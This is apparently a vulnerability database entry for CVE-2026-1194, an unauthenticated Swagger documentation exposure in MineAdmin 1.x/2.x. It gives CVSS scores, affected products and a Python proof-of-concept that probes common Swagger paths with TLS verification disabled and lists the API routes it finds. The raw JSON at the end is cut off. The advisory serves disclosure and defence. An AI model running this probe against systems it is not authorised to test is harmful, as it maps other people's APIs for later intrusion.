Security Vulnerability Report
CVE-2026-1194 CVSS 5.3 MEDIUM

CVE-2026-1194

Published: 2026-01-20 00:15:49
Last Modified: 2026-02-05 20:06:59

Description

A security flaw has been discovered in MineAdmin 1.x/2.x. It affects an unspecified function of the Swagger component, and manipulating it results in information disclosure. The attack can be carried out remotely. An exploit has been released publicly and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
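CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Note: the score and vector shown here are the record's Secondary-source CVSS 3.1 assessment. The raw JSON below also carries a Primary CVSS 3.1 assessment of 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) and a CVSS 4.0 base score of 5.5, so prioritisation should take the higher confidentiality rating into account.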

Configurations (Affected Products)

cpe:2.3:a:mineadmin:mineadmin:1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mineadmin:mineadmin:2.0:*:*:*:*:*:*:* - VULNERABLE
MineAdmin 1.x
MineAdmin 2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
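# CVE-2026-1194 PoC - MineAdmin Swagger Information Disclosure
# Target: MineAdmin 1.x/2.x
# Component: Swagger API Documentation
#
# Exposure check: requests a fixed list of common Swagger/OpenAPI paths and
# reports which ones answer without credentials. A hit means the API
# documentation is reachable anonymously; the usual remediation is to disable
# those routes in production or place them behind authentication.
import requests
import sys
import json


def _print_api_paths(response, limit=5):
    """Print the number of documented API paths and the first *limit* of them.

    The body comes from the remote server and is untrusted, so it is only
    summarised when it parses as a JSON object whose ``paths`` member is
    itself an object. Anything else is skipped silently.
    """
    try:
        api_info = response.json()
    except ValueError:
        # Not JSON (requests' JSONDecodeError is a ValueError subclass).
        return

    paths = api_info.get('paths') if isinstance(api_info, dict) else None
    if not isinstance(paths, dict):
        return

    print(f" [!] API paths discovered: {len(paths)}")
    for path in list(paths)[:limit]:
        print(f" - {path}")


def check_swagger_exposure(target_url):
    """Check if Swagger documentation is exposed without authentication.

    Args:
        target_url: Base URL of the deployment to check; a trailing slash is
            ignored.

    Returns:
        True if at least one candidate endpoint answered HTTP 200 with a body
        that passed the content heuristic, otherwise False.

    The heuristic is deliberately loose: any 200 response that is HTML, JSON
    or longer than 100 characters counts. A login page reached through a
    redirect, or a catch-all route of a single-page application, will
    therefore be reported as well, so each hit should be confirmed by looking
    at the returned body before it is treated as a finding.
    """
    swagger_endpoints = [
        "/api/swagger",
        "/swagger-ui.html",
        "/api/doc",
        "/swagger/index.html",
        "/api/swagger.json",
        "/swagger/doc.json",
    ]

    print(f"[*] Testing target: {target_url}")
    print("[*] Checking for exposed Swagger endpoints...\n")

    exposed_endpoints = []
    base_url = target_url.rstrip('/')

    for endpoint in swagger_endpoints:
        url = base_url + endpoint
        try:
            # verify=False disables TLS certificate validation so that
            # deployments with self-signed certificates can be checked. The
            # peer is then unauthenticated: an on-path device can answer in
            # its place, and requests emits an InsecureRequestWarning.
            response = requests.get(url, timeout=10, verify=False)
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
            continue

        if response.status_code != 200:
            continue

        content_type = response.headers.get('Content-Type', '')
        looks_like_docs = (
            'html' in content_type
            or 'json' in content_type
            or len(response.text) > 100
        )
        if not looks_like_docs:
            continue

        print(f"[+] Found exposed endpoint: {url}")
        print(f" Status: {response.status_code}")
        # len(response.content) is the size in bytes; len(response.text)
        # would count decoded characters and mislabel them as bytes.
        print(f" Content-Length: {len(response.content)} bytes")
        exposed_endpoints.append(url)

        # Try to extract API information
        if endpoint.endswith('.json'):
            _print_api_paths(response)
        print()

    if exposed_endpoints:
        print(f"[!] VULNERABLE: {len(exposed_endpoints)} Swagger endpoint(s) exposed")
        print("[!] This allows attackers to gather sensitive API information")
        return True

    print("[-] No exposed Swagger endpoints found")
    return False


if __name__ == "__main__":
    # Require an explicit base URL. Falling back to a placeholder hostname
    # would send requests to whatever host that name happens to resolve to.
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <base-url>", file=sys.stderr)
        sys.exit(2)
    check_swagger_exposure(sys.argv[1])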

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1194", "sourceIdentifier": "[email protected]", "published": "2026-01-20T00:15:48.727", "lastModified": "2026-02-05T20:06:58.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in MineAdmin 1.x/2.x. This affects an unknown function of the component Swagger. The manipulation results in information disclosure. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en MineAdmin 1.x/2.x. Esto afecta una función desconocida del componente Swagger. La manipulación resulta en revelación de información. El ataque puede realizarse de forma remota. El exploit ha sido publicado y puede ser utilizado para ataques. Se contactó con el proveedor con antelación sobre esta revelación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": 
"NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, 
"obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A167C8E-5C7F-4192-8DD0-01444D06C9CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EED883D-2F40-4DE0-8816-8495146E06B6"}]}]}], "references": [{"url": "https://github.com/SourByte05/MineAdmin-Vulnerability/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341779", "source": "[email protected]", "tags": ["Permissions Requir ... (truncated)